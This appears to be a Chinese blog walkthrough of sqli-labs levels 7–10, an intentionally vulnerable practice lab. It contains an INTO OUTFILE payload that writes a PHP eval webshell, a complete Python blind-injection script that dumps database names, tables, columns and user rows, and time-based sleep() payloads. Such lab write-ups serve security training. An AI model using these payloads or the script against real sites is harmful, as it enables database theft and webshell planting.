sqli-labs less7-10

  1. sqli-labs less7-10
    1. less-7:GET-基于错误-双引号-文件导出
    2. less-8:GET-基于布尔类型-盲注
    3. less-9:GET-基于时间类型-盲注
    4. Less-10

sqli-labs less7-10

[TOC]

less-7:GET-基于错误-双引号-文件导出

练习mysql的文件写入。我们的目的是将一句话木马写入到网站的Less-7目录下

先去用 ‘ “ 之类的测试
发现,用 “ 返回页面无变化,用 ‘ 返回页面出错,说明这个结构肯定是带 ‘ 的。

‘ 的返回页面为:

但是绝对和单引号有关,所以试试 ‘) , ‘))

‘) 也错了

‘)) 返回页面正常!!

说明sql语句应该是这样:

 select * from table where id = (('input'));

http://43.247.91.228:84/Less-7/?id=1‘)) union select 1,2,”<?php @eval($_POST[‘cmd’]); ?>” into outfile “/var/www/html/dd1.php”

less-8:GET-基于布尔类型-盲注

发现加个单引号跟没加显示不一样,加了单引号连you are in都不显示了,没有报错,所以只能用盲注判断了
http://43.247.91.228:84/Less-8/?id=1‘ and ascii(substr((select database()),1,1))>64 %23

放一个脚本:

# coding: utf-8

import urllib2
import urllib

success_str = "You are in"
getTable = "users"

index = "0"
url = "http://43.247.91.228:84/Less-8/?id=1"
database = "database()"
selectDB = "select database()"
selectTable = "select table_name from information_schema.tables where table_schema='%s' limit %d,1"

asciiPayload = "' and ascii(substr((%s),%d,1))>=%d #"
lengthPayload = "' and length(%s)>=%d #"
selectTableCountPayload = "'and (select count(table_name) from information_schema.tables where table_schema='%s')>=%d #"

selectTableNameLengthPayloadfront = "'and (select length(table_name) from information_schema.tables where table_schema='%s' limit "
selectTableNameLengthPayloadbehind = ",1)>=%d #"

# 获取字符串的长度
def getLengthOfString(payload, string):
    # 猜长度
    lengthLeft = 0
    lengthRigth = 0
    guess = 10
    # 确定长度上限,每次增加5
    while 1:
        # 如果长度大于guess
        if getLengthResult(payload, string, guess) == True:
            # 猜测值增加5
            guess = guess + 5
        else:
            lengthRigth = guess
            break
            # print "lengthRigth: " + str(lengthRigth)
    # 二分法查长度
    mid = (lengthLeft + lengthRigth) / 2
    while lengthLeft < lengthRigth - 1:
        # 如果长度大于等于mid
        if getLengthResult(payload, string, mid) == True:
            # 更新长度的左边界为mid
            lengthLeft = mid
        else:
            # 否则就是长度小于mid
            # 更新长度的右边界为mid
            lengthRigth = mid
            # 更新中值
        mid = (lengthLeft + lengthRigth) / 2
        # print lengthLeft, lengthRigth
    # 因为lengthLeft当长度大于等于mid时更新为mid,而lengthRigth是当长度小于mid时更新为mid
    # 所以长度区间:大于等于 lengthLeft,小于lengthRigth
    # 而循环条件是 lengthLeft < lengthRigth - 1,退出循环,lengthLeft就是所求长度
    # 如循环到最后一步 lengthLeft = 8, lengthRigth = 9时,循环退出,区间为8<=length<9,length就肯定等于8
    return lengthLeft


# 获取名称
def getName(payload, string, lengthOfString):
    # 32是空格,是第一个可显示的字符,127是delete,最后一个字符
    tmp = ''
    for i in xrange(1, lengthOfString + 1):
        left = 32
        right = 127
        mid = (left + right) / 2
        while left < right - 1:
            # 如果该字符串的第i个字符的ascii码大于等于mid
            if getResult(payload, string, i, mid) == True:
                # 则更新左边界
                left = mid
                mid = (left + right) / 2
            else:
                # 否则该字符串的第i个字符的ascii码小于mid
                # 则更新右边界
                right = mid
                # 更新中值
            mid = (left + right) / 2
        tmp += chr(left)
    return tmp


# 发送请求,根据页面的返回的判断长度的猜测结果
# string:猜测的字符串 payload:使用的payload  length:猜测的长度
def getLengthResult(payload, string, length):
    finalUrl = url + urllib.quote(payload % (string, length))
    res = urllib2.urlopen(finalUrl)
    if success_str in res.read():
        return True
    else:
        return False



 # 发送请求,根据页面的返回的判断猜测的字符是否正确
# payload:使用的payload    string:猜测的字符串   pos:猜测字符串的位置    ascii:猜测的ascii
def getResult(payload, string, pos, ascii):
    finalUrl = url + urllib.quote(payload % (string, pos, ascii))
    res = urllib2.urlopen(finalUrl)
    if success_str in res.read():
        return True
    else:
        return False



# 注入
def inject():
    # 猜数据库长度
    lengthOfDBName = getLengthOfString(lengthPayload, database)
    print "length of DBname: " + str(lengthOfDBName)
    # 获取数据库名称
    DBname = getName(asciiPayload, selectDB, lengthOfDBName)

    print "current database:" + DBname

    # 获取数据库中的表的个数
    # print selectTableCountPayload
    tableCount = getLengthOfString(selectTableCountPayload, DBname)
    print "count of talbe:" + str(tableCount)

    # 获取数据库中的表
    for i in xrange(0, tableCount):
        # 第几个表
        num = str(i)
        # 获取当前这个表的长度
        selectTableNameLengthPayload = selectTableNameLengthPayloadfront + num + selectTableNameLengthPayloadbehind
        tableNameLength = getLengthOfString(selectTableNameLengthPayload, DBname)
        print "current table length:" + str(tableNameLength)
        # 获取当前这个表的名字
        selectTableName = selectTable % (DBname, i)
        tableName = getName(asciiPayload, selectTableName, tableNameLength)
        print tableName

    selectColumnCountPayload = "'and (select count(column_name) from information_schema.columns where table_schema='" + DBname + "' and table_name='%s')>=%d #"
    # print selectColumnCountPayload
    # 获取指定表的列的数量
    columnCount = getLengthOfString(selectColumnCountPayload, getTable)
    print "table:" + getTable + " --count of column:" + str(columnCount)

    # 获取该表有多少行数据
    dataCountPayload = "'and (select count(*) from %s)>=%d #"
    dataCount = getLengthOfString(dataCountPayload, getTable)
    print "table:" + getTable + " --count of data: " + str(dataCount)

    data = []
    # 获取指定表中的列
    for i in xrange(0, columnCount):
        # 获取该列名字长度
        selectColumnNameLengthPayload = "'and (select length(column_name) from information_schema.columns where table_schema='" + DBname + "' and table_name='%s' limit " + str(
            i) + ",1)>=%d #"
        # print selectColumnNameLengthPayload
        columnNameLength = getLengthOfString(selectColumnNameLengthPayload, getTable)
        print "current column length:" + str(columnNameLength)
        # 获取该列的名字
        selectColumn = "select column_name from information_schema.columns where table_schema='" + DBname + "' and table_name='%s' limit %d,1"
        selectColumnName = selectColumn % (getTable, i)
        # print selectColumnName
        columnName = getName(asciiPayload, selectColumnName, columnNameLength)
        print columnName

        tmpData = []
        tmpData.append(columnName)
        # 获取该表的数据
        for j in xrange(0, dataCount):
            columnDataLengthPayload = "'and (select length(" + columnName + ") from %s limit " + str(j) + ",1)>=%d #"
            # print columnDataLengthPayload
            columnDataLength = getLengthOfString(columnDataLengthPayload, getTable)
            # print columnDataLength
            selectData = "select " + columnName + " from users limit " + str(j) + ",1"
            columnData = getName(asciiPayload, selectData, columnDataLength)
            # print columnData
            tmpData.append(columnData)

        data.append(tmpData)

        # print data
    # 格式化输出数据
    # 输出列名
    tmp = ""
    for i in xrange(0, len(data)):
        tmp += data[i][0] + "   "
    print tmp
    # 输出具体数据
    for j in xrange(1, dataCount + 1):
        tmp = ""
        for i in xrange(0, len(data)):
            tmp += data[i][j] + "   "
        print tmp



if __name__ == "__main__":
    print "-----------inject starting----------"
    inject()

与less5相似

less-9:GET-基于时间类型-盲注

基于时间的盲注,只用修改一下上面的python脚本即可实现,加个时间判断,payload:
http://127.0.0.1/sql/Less-9/?id=1‘ and if(ascii(substr(database(),1,1))>115, 0, sleep(2)) %23
这里if判断为真,所以会执行sleep(2),查询操作会有明显的延迟。如果为假,即不正确,那么就不会执行sleep(2),页面回显会明显的很快。
在了解了这些基本知识之后,我们使用一下payload来sql注入
http://192.168.1.158/sqli-labs/Less-8/?id=1‘ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+

Less-10

第10关只要把前面两关payload部分的单引号改成双引号即可。
猜测数据库:
http://127.0.0.1/sqllib/Less-10/?id=1"and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:sqli-labs less7-10

文章字数:1,430

本文作者:Mang0

发布时间:2018-04-02, 16:15:23

最后更新:2018-11-02, 21:52:15

原始链接:http://mang0.me/archis/9a0d7777/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏